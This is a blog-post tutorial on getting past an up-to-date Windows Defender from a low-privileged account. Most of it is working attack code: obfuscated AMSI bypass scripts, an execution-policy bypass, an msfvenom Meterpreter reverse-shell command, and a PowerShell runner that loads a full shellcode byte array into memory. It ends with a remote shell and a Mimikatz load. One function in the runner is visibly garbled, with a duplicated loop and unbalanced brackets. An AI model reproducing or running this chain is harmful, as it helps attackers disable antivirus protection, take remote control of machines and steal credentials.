
Bypassing Windows Defender (latest version)

Published: 2023-01-25 19:04:52  Views: 73

In this article we bypass Windows Defender (latest version) and explain each step in detail.

Setup

- Windows 10 machine (target)
- A low-privileged account already obtained on the target
- Linux machine (attacker)
- Defender antivirus running and fully updated at the time of writing

Payload

  • Payload Runner:
[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
@($moduleName)), $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),
(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
[Byte[]] $buf = <PAYLOAD HEAD>
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)


  • AMSI bypass (Windows Antimalware Scan Interface)
$xudbk = @"
using System;
using System.Runtime.InteropServices;
public class xudbk {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $xudbk
$wvyfoqc = [xudbk]::LoadLibrary("$(('âmsì.'+'dll').nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")
$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(('ÁmsìScänBu'+'ffer').NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")
$p = 0
[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)
$qbzv = "0xB8"
$dnyd = "0x57"
$ttvz = "0x00"
$xcoe = "0x07"
$vslp = "0xC3"
$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)
[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)
  • Execution policy bypass
Set-ExecutionPolicy Unrestricted -Scope CurrentUser
  • Generate the payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=443 EXITFUNC=thread -f powershell

Prerequisites

A low-privileged user has been obtained on the target machine. The target is running Windows Defender with all protections in place. The next step would be to run several scripts and enumeration tools to find a privilege-escalation vector, but Windows Defender blocks every attempt.

So an evasion technique is needed; this article walks through that technique.

Bypass procedure

  • Bypass the execution policy
  • Bypass the Antimalware Scan Interface (AMSI)
  • Generate the payload
  • Create the PowerShell runner
  • Execute the PowerShell runner, which launches the final payload

Proof of Concept (PoC)

We work in the context of the "test" user, a standard local account on the target machine.

[screenshot]

Also check the Windows Defender status on the target machine:

[screenshots]

Windows Defender is up to date and running with all modules enabled.

First, open a PowerShell terminal on the target machine and set the execution policy to Unrestricted with the following command:

Set-ExecutionPolicy Unrestricted -Scope CurrentUser

[screenshot]

Next, check whether the Antimalware Scan Interface (AMSI) is in place. If you want to learn more about AMSI, see Microsoft's official documentation. Enter the following in the console to check whether AMSI is running: 'amsiutils'

[screenshot]

If a red warning message is shown, AMSI is working as intended.

Next, we try to bypass AMSI by copying and pasting the script (from the "Payload" section of this article) directly into our PowerShell console:

$xudbk = @"
using System;
using System.Runtime.InteropServices;
public class xudbk {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr pbsxld, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $xudbk
$wvyfoqc = [xudbk]::LoadLibrary("$(('âmsì.'+'dll').nOrMALIZe([cHAR](70)+[ChAR]([BYTE]0x6f)+[CHAr](114)+[ChAR]([byTe]0x6d)+[CHAR](68*12/12)) -replace [Char](92+19-19)+[cHar]([ByTe]0x70)+[cHaR](123+15-15)+[chAR](77)+[Char](110*102/102)+[cHar]([BytE]0x7d))")
$dhdzwx = [xudbk]::GetProcAddress($wvyfoqc, "$(('ÁmsìScänBu'+'ffer').NorMAlIZE([chaR]([byTE]0x46)+[chAR](111)+[char]([Byte]0x72)+[chAR]([BYtE]0x6d)+[CHar]([byTE]0x44)) -replace [cHar]([BYTe]0x5c)+[CHAr](112)+[cHAR]([bytE]0x7b)+[char]([bytE]0x4d)+[ChAR](110)+[CHAR](125+4-4))")
$p = 0
[xudbk]::VirtualProtect($dhdzwx, [uint32]5, 0x40, [ref]$p)
$qbzv = "0xB8"
$dnyd = "0x57"
$ttvz = "0x00"
$xcoe = "0x07"
$vslp = "0xC3"
$dcios = [Byte[]] ($qbzv,$dnyd,$ttvz,$xcoe,+$dlsl,+$vslp)
[System.Runtime.InteropServices.Marshal]::Copy($dcios, 0, $dhdzwx, 6)

[screenshot]

Run 'amsiutils' again: the red warning no longer appears, which indicates that AMSI has been disabled.

[screenshot]

Now generate a Meterpreter payload on the attacker machine with MSFVenom. Use a common port such as 443 to get past any firewall rules in place and possibly avoid raising alerts.

[screenshot]

Copy and paste the generated payload into our runner (found in the 'Payload' section at the beginning of the article) to get the final version:

[Ref].Assembly.GetType('System.Management.Automation.Amsi'+[char]85+'tils').GetField('ams'+[char]105+'InitFailed','NonPublic,Static').SetValue($null,$true)
function LookupFunc {
Param ($moduleName, $functionName)
$assem = ([AppDomain]::CurrentDomain.GetAssemblies() |
Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].
Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
$tmp=@()
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
$assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}}
@($moduleName)), $functionName))
}
function getDelegateType {
Param (
[Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,
[Parameter(Position = 1)] [Type] $delType = [Void]
)
$type = [AppDomain]::CurrentDomain.
DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')),
[System.Reflection.Emit.AssemblyBuilderAccess]::Run).
DefineDynamicModule('InMemoryModule', $false).
DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass',
[System.MulticastDelegate])
$type.
DefineConstructor('RTSpecialName, HideBySig, Public',
[System.Reflection.CallingConventions]::Standard, $func).
SetImplementationFlags('Runtime, Managed')
$type.
DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).
SetImplementationFlags('Runtime, Managed')
return $type.CreateType()
}
$lpMem = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualAlloc),
(getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32])([IntPtr]))).Invoke([IntPtr]::Zero, 0x1000, 0x3000, 0x40)
[Byte[]] $buf = 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x0,0x0,0x0,0x41,0x51,0x41,0x50,0x52,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x51,0x48,0x8b,0x52,0x18,0x48,0x8b,0x52,0x20,0x56,0x4d,0x31,0xc9,0x48,0xf,0xb7,0x4a,0x4a,0x48,0x8b,0x72,0x50,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x2,0x2c,0x20,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x1,0xd0,0x66,0x81,0x78,0x18,0xb,0x2,0xf,0x85,0x72,0x0,0x0,0x0,0x8b,0x80,0x88,0x0,0x0,0x0,0x48,0x85,0xc0,0x74,0x67,0x48,0x1,0xd0,0x8b,0x48,0x18,0x50,0x44,0x8b,0x40,0x20,0x49,0x1,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x1,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0xd,0x41,0x1,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x3,0x4c,0x24,0x8,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x1,0xd0,0x66,0x41,0x8b,0xc,0x48,0x44,0x8b,0x40,0x1c,0x49,0x1,0xd0,0x41,0x8b,0x4,0x88,0x41,0x58,0x41,0x58,0x5e,0x59,0x48,0x1,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,0x4b,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,0x33,0x32,0x0,0x0,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,0xa0,0x1,0x0,0x0,0x49,0x89,0xe5,0x49,0xbc,0x2,0x0,0x1,0xbb,0xc0,0xa8,0x3,0x4,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,0xf1,0x41,0xba,0x4c,0x77,0x26,0x7,0xff,0xd5,0x4c,0x89,0xea,0x68,0x1,0x1,0x0,0x0,0x59,0x41,0xba,0x29,0x80,0x6b,0x0,0xff,0xd5,0x6a,0xa,0x41,0x5e,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,0xea,0xf,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0xa,0x49,0xff,0xce,0x75,0xe5,0xe8,0x93,0x0,0x0,0x0,0x48,0x83,0xec,0x10,0x48,0x89,0xe2,0x4d,0x31,0xc9,0x6a,0x4,0x41,0x58,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7e,0x55,0x48,0x83,0xc4,0x20,0x5e,0x89,0xf6,0x6a,0x40,0x41,0x59,0x68,0x0,0x10,0x0,0x0,0x41,0x58,0x48,0x89,0xf2,0x48,0x31,0xc9,0x41,0xba,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x48,0x89,0xc3,0x49,0x89,0xc7,0x4d,0x31,0xc9,0x49,0x89,0xf0,0x48,0x89,0xda,0x48,0x89,0xf9,0x41,0xba,0x2,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x0,0x7d,0x28,0x58,0x41,0x57,0x59,0x68,0x0,0x40,0x0,0x0,0x41,0x58,0x6a,0x0,0x5a,0x41,0xba,0xb,0x2f,0xf,0x30,0xff,0xd5,0x57,0x59,0x41,0xba,0x75,0x6e,0x4d,0x61,0xff,0xd5,0x49,0xff,0xce,0xe9,0x3c,0xff,0xff,0xff,0x48,0x1,0xc3,0x48,0x29,0xc6,0x48,0x85,0xf6,0x75,0xb4,0x41,0xff,0xe7,0x58,0x6a,0x0,0x59,0xbb,0xe0,0x1d,0x2a,0xa,0x41,0x89,0xda,0xff,0xd5
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $lpMem, $buf.length)
$hThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll CreateThread),
(getDelegateType @([IntPtr], [UInt32], [IntPtr], [IntPtr],[UInt32], [IntPtr])([IntPtr]))).Invoke([IntPtr]::Zero,0,$lpMem,[IntPtr]::Zero,0,[IntPtr]::Zero)
[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll WaitForSingleObject),
(getDelegateType @([IntPtr], [Int32])([Int]))).Invoke($hThread, 0xFFFFFFFF)

Start the listener on the attacker machine with Metasploit.

[screenshot]

Finally, copy and paste the runner directly into the PowerShell console on the victim machine.

[screenshot]

Check the handler:

[screenshot]

We got a shell!!!

[screenshot]

In just 5 simple steps we were able to bypass Windows Defender with all of its modules up and running.

Let's try running Mimikatz from our meterpreter shell (something Defender normally rejects immediately).

[screenshot]

Load succeeded!



Source: https://blog.51cto.com/u_15945480/6022706
